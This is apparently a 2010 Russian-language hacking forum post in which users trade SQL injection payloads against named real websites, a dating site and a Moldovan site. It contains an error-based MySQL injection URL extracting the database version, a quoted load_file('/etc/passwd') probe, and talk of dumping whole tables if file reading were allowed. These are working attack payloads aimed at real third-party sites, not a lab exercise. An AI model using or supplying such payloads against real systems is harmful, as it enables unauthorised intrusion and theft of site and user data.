09.03.2010, 22:24
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Сообщение от j0ker13
http://www.tomydate.com/search_results.php?keyword=1'
помогите)
http://www.tomydate.com/search_results.php?keyword=1')+or(1,2)=(select*fro m(select+name_const(version(),1),name_const(versio n(),1))a)--+
Сообщение от overcrookd
http://enjoy.md/category.php?id=6+or+1=if%28load_file%28%27/etc/passwd%27%29+is+not+NULL,1,2%29--+
значит всё же file_priv=Y? если я чёт намудрил плз исправьте
нету там доступа к файлам
Сообщение от overcrookd
кстати: @@datadir - /var/lib/mysql/
а при ошибке даёт другой путь: /home/vhosts/enjoy.md/public_html/category.php
так датадир это домашняя дира самого мускула, кстате еслиб была возможность читать файлы можно было бы слить сразу инфу всю с таблиц если буфер позволит) а то что при ошибки это директория самого сайта видная из веба
Последний раз редактировалось warlok; 09.03.2010 в 22:32..
|
|
|